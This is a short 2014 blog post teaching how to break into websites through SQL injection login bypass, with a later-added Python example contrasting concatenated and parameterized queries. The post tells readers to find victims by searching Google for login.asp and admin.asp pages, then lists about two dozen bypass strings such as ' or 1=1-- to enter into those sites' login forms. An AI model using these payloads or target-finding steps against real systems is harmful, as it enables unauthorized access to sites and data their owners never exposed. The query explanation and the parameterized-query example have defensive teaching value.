Website Hacking : How to hack website by SQL Injection

By Unknown - Monday 17 February 2014
Hello Friends,
In this post I am going to explain how to hack websites by SQL Injection.
This is the most common way to hack into a website that is vulnerable to SQL injection.
What is SQL Injection?
A technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
How to hack if SQL Injection is found?
To find a vulnerable host, go to Google and search for login.asp or admin.asp. It shows thousands of vulnerable sites. Now, using proxies set in the browser, click through interesting targets, seeing what's what on the site pages if interesting. Let the site be:
http://www.somesite.com/login.asp or
http://www.another.com/admin/login.asp
This page asks for a username and password to log in. You can try the following usernames and passwords for login:
admin'-- ' or 0=0 -- " or 0=0 --
or 0=0 -- ' or 0=0 # " or 0=0 #
or 0=0 # ' or 'x'='x " or "x"="x
') or ('x'='x ' or 1=1-- " or 1=1--
or 1=1-- ' or a=a-- " or "a"="a
') or ('a'='a ") or ("a"="a hi" or "a"="a
hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a
hi') or ('a'='a hi") or ("a"="a
I will try to post a long list of these combinations soon.
How does it work?
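The server-side login code builds its query by concatenating the user input into the SQL string:
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery(
    "select * from user_details where user_name = '" + username
    + "' and password = '" + password + "'");
Now suppose username = "' or 1=1 --". The quote closes the user_name string, and -- turns the rest of the statement, including the password check, into a comment.
Since the condition 1=1 is always true, you are successfully logged in to the database server.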
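An added example, not part of the original post: the query above rebuilt in Python with sqlite3 (standing in for the post's JDBC code) beside a parameterized version, so both can be run against the same inputs. The table contents, passwords and function names are constructed for illustration; in JDBC the equivalent of the bound query is a PreparedStatement with ? placeholders.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names follow the post's query.
    # The plain-text password column mirrors that query; real systems store
    # salted password hashes instead.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_details (user_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO user_details VALUES (?, ?)",
                     [("admin", "S3cret!"), ("o'brien", "hunter2")])
    return conn

def login_concatenated(conn, username, password):
    # Same shape as the post's code: input is pasted into the SQL text,
    # so quote characters in it become part of the statement.
    sql = ("select * from user_details where user_name = '" + username +
           "' and password = '" + password + "'")
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # malformed SQL, e.g. a legitimate name containing a quote

def login_parameterized(conn, username, password):
    # Placeholders keep the SQL text fixed; the driver binds the inputs as
    # values, so they are only ever compared against the columns.
    sql = "select 1 from user_details where user_name = ? and password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

def compare(conn, username, password):
    # Returns (result of concatenated query, result of parameterized query).
    return (login_concatenated(conn, username, password),
            login_parameterized(conn, username, password))

if __name__ == "__main__":
    db = make_db()
    for user, pw in [("admin", "S3cret!"), ("admin", "wrong"),
                     ("' or 1=1 --", "anything"), ("o'brien", "hunter2")]:
        print(repr(user), compare(db, user, pw))
```

The concatenated form fails in both directions: it accepts the post's always-true input and rejects a legitimate user whose name contains a quote, while the bound form handles both correctly.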
I hope you like this post, and if you are a developer, try to avoid these types of vulnerabilities.
Your friend, Unknowndevice64
